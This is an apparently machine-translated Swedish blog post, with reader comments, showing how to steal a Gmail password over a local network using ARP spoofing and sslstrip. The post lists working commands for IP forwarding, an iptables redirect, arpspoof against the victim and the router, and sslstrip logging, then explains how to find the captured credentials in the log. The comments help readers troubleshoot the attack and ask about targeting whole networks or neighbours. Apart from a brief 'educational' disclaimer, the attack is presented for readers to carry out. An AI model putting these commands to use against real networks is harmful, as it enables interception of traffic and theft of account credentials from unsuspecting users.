ArpSpoofing och SSlstrip i aktion.

Hej bloggare.

För idag har jag ett litet urval av hur farligt det kan vara att vara ansluten till något oskyddat nätverk av dem som så många av oss gillar.

För idag ska jag använda ArpSpoofing med Sslstrip för att få ett Gmail-lösenord. För att göra miljön mer kontrollerad har jag skapat ett konto som heter "testarp@gmail.com".

Och eftersom jag inte gillar inledningarna så mycket, låt oss börja.

Jag är inte ansvarig när som helst för vad de kan göra med följande information. Jag gör det uteslutande för utbildningsändamål

MILJÖ

För det här testet har vi följande:

1. Angripare: Det är min stationära eller stationära dator som har Debian Wheezy. Från arkiv kan du installera sslstrip y dsniff att få ha harpspoofing

2. Offer: Offret är en Android-surfplatta som bara vill se sin e-post via webbläsaren.

3. Mediet: Mitten är min Cisco DPC2425-router

ADRESSER.

Attackeradress: 172.26.0.2

Routeradress: 172.26.0.1

Offerens adress: 172.26.0.8

ATTACKEN:

För att förstå lite mer hur attacken fungerar kan du gå till min gamla POST

Det första vi kommer att göra för denna attack är att aktivera framåt så att vår dator kan vidarebefordra informationen till offret utan att de märker. (Annars skulle det vara ett förnekande av tjänsterangrepp)

För det kommer vi att använda:

echo "1" > /proc/sys/net/ipv4/ip_forward iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080

arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
sslstrip -a -w desdelinux -l 8080

Varje kommando i ett direkt konsolfönster.

Nu om vi gör tail -f från Linux ser vi informationen live och direkt

 

ögonblicksbild1

 

Så hur får vi det vi vill ha?

Låt oss först skriva in vår e-post på surfplattan. När vi loggar in ser vi att tusentals och tusentals saker visas på vår konsol.

Nu när du är klar kommer vi att öppna vår fil "desdelinux" med nano

nano desdelinux

med Control + W söker vi efter något som heter SÄKER POST.

Och vi får se något liknande.

 

ögonblicksbild2

 

Bland den enorma linjen som inte kan ses är offrets e-postadress och lösenord.

Så vi springer åt höger tills vi äntligen ser ljuset i slutet av tunneln.

 

ögonblicksbild3

 

Vid ett annat tillfälle kommer vi att se hur vi kan skydda oss lite från dessa attacker.

hälsningar


Innehållet i artikeln följer våra principer om redaktionell etik. Klicka på för att rapportera ett fel här.

27 kommentarer, lämna din

Lämna din kommentar

Din e-postadress kommer inte att publiceras.

*

*

  1. Ansvarig för uppgifterna: Miguel Ángel Gatón
  2. Syftet med uppgifterna: Kontrollera skräppost, kommentarhantering.
  3. Legitimering: Ditt samtycke
  4. Kommunikation av uppgifterna: Uppgifterna kommer inte att kommuniceras till tredje part förutom enligt laglig skyldighet.
  5. Datalagring: databas värd för Occentus Networks (EU)
  6. Rättigheter: När som helst kan du begränsa, återställa och radera din information.

  1.   @Jlcmux sade

    Jag tar tillfället i akt och säger att när inlägget publicerades var kommandona inte korrekta.

    Kommandot iptables i slutet saknar 8080 som var kvar på en annan rad. Och då var arpspoof-kommandona på samma rad. Varje kommando är på en annan rad.

    Förhoppningsvis ser redaktören det och kan fixa det.

    Hälsningar.

    1.    Källans manual sade

      Jag har gjort de korrigeringar du nämner, är det okej?

      Om du ska infoga kod i en önskad post, använd HTML-vyn och kontrollera att artikeln är korrekt innan du skickar den till väntande. Tack.

  2.   Luis sade

    Det är kyligt att veta att de av oss som inte har kunskap är så sårbara. Mycket bra information även när jag förstår lite av ämnet inser jag vikten. Tack!
    hälsningar

  3.   Giskard sade

    Men det fungerar bara om angriparen och offret är i samma nätverk. I vilket fall som helst verkar det som om du (i samma nätverk) ansluter med HTTPS så händer det inte eftersom data krypteras INNAN du lämnar din maskin. Om du ansluter via HTTP (utan S) tror jag att även om du tittar på nätverkskabeln ser du nycklarna.

    1.    @Jlcmux sade

      Det är inte sant. Jag hackar ett gmail-lösenord och om du märker att gmail använder https. Så? Poängen är att även om https är säkert beror det på http. Så det är inte så säkert.

      Bekänn inte så mycket om en https att S inte är för Superman utan för "säker"

    2.    RTen sade

      det fungerar med eller utan https, jag har provat det med en mer specialiserad linux distro och det fungerar utan problem

    3.    Källans manual sade

      Du kan exakt använda den för att lära en lektion för dem som stjäl ditt Wi-Fi. 😀

      Det är mer eller mindre som vad de sa för länge sedan på Chema Alonsos blogg:

      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba.html
      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba_5.html

      1.    Rayonant sade

        Ostia, det är fantastiskt! / Och sedan berättar de för min paranoida varje gång jag använder VPN när de går för att kontrollera bankkontot ...). Förresten måste du se hur cyniskt människor är i kommentarerna ... om det till slut stjäl ...

        1.    eliotime3000 sade

          Nu måste vi ta en handledning om hur du skapar och erbjuder din egen VPN-tjänst.

      2.    Daniel sade

        Historien som du länkar är väldigt intressant, den verkar till och med värdig en romanbok, och detta får mig att komma ihåg när jag använde mina grannars internet och även om jag säger att jag känner till ämnet så tror jag att jag aldrig kunde se de verkliga dimensionerna av faran att jag kunde ha haft, lyckligtvis för mig ändrade de bara lösenordet till WPA2 och det var där min historia med ISP började haha

    4.    Mauritius sade

      Det är därför titeln säger Sslstrip i aktion.

      Det fungerar så länge angriparen är i mitten

  4.   Anon sade

    Vilken våg arbetar du med prisma? -.-
    nr.
    Vad väntar du på att skicka din förfrågan XD
    gäller
    bra inlägg

  5.   auroszx sade

    Intressant, jag ska göra ett pedagogiskt test senare ... Kanske kan jag till och med ta bort lösenordet till WiFi och ha kul lite 😛
    Av någon chans, kan du göra något liknande för att skicka olika sidor till de mål som begärts? Till exempel vill de öppna Facebook och jag omdirigerar dem till Google? 😛

    1.    @Jlcmux sade

      Ja. Men allt är en helt annan rulle.

      Jag kanske lägger upp det senare.

  6.   senaste nybörjaren sade

    mycket bra inlägg, dessa ämnen är väldigt lärorika, nu måste vi kunna motverka denna attack, eftersom vissa (som jag) ansluter till offentliga nätverk (universitetet till exempel) skulle det vara till hjälp att undvika det.

    Hälsningar!

  7.   bara-en annan-dl-användare sade

    Det fungerade inte för mig 🙁

  8.   Wow sade

    Något misslyckas här, förutom det faktum att https-anslutningarna krypteras genom ett servercertifikat (när du har certifikatet på din maskin, är din webbläsare ansvarig för krypteringen) med iptables omdirigerar du port 80 (http), inte 443 vilket är https

    1.    @Jlcmux sade

      Jag trodde det också. Poängen är att även om https är "säkert" beror det tyvärr på http. Så sslstrip utnyttjar det, det får webbläsaren att tro att den använder https-referenser men det är det inte.

      1.    Wow sade

        helig skit! men webbläsaren skulle se en varning som "detta certifikat kommer från en misstänkt webbplats eller något liknande" ... jag måste definitivt göra tester XD

        1.    @Jlcmux sade

          Nej, absolut ingenting kommer ut.

  9.   bara-en annan-dl-användare sade

    Det fungerade äntligen för mig
    Jag är ansluten till ett WEP-nätverk med lösenord, och det visade mig lösenordet direkt ändå.

    En fråga. Kan du göra samma procedur men för alla datorer som är anslutna i nätverket, istället för att ha ett enda offer?

    1.    @Jlcmux sade

      Jo det kan du. Men jag har inte gjort experiment. Prova själv och berätta hur det går.

  10.   sinnick19 sade

    Det enda jag får med detta är att offrets maskin går offline, men sslstrip visar mig inget: /

    1.    @Jlcmux sade

      Du måste inaktivera brandväggen ett ögonblick. Eller åtminstone aktivera inkommande anslutningar.

  11.   Herr Black sade

    Probe och jag kunde bara se användarnamnet och lösenordet på facebooksidan, i gmail hittade jag inga resultat i loggen, jag behövde bara en rad med arpspoof «arpspoof -i -t«. Å andra sidan kunde offermaskinen inte öppna några sidor. Jag kommer att fortsätta undersöka, det är väldigt intressant. En hjälp för dem som använder Manjaro, paketen att installera är: dsniff (här är arpspoff), twisted och python2-pyopenssl. Sslstrip kan laddas ner härifrån: http://www.thoughtcrime.org/software/sslstrip/
    För att köra $ python2 sslstrip.py
    Hälsningar.

  12.   Herr Black sade

    Det kom inte ut men arpspoof-linjen är: #arpspoof -i int -t ip-victim ip-router

  13.   Gilbert sade

    jag gör precis vad du säger:

    echo "1"> / proc / sys / net / ipv4 / ip_forward iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 8080

    arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
    arpspoof -i eth0 -t 172.26.0.1 172.26.0.2

    Problemet är att offret, som är en annan dator som jag har här i mitt rum, lämnas utan anslutning till den punkt att jag måste starta om routern, vad kan jag göra, hjälp mig.

    En annan sak som jag jobbar med en virtuell maskin, och när jag kör iwconfig-kommandot visas inte wlan0, inte heller när jag kör ifconfig, men om jag har internet på min virtuella maskin vad med ett eth0-gränssnitt.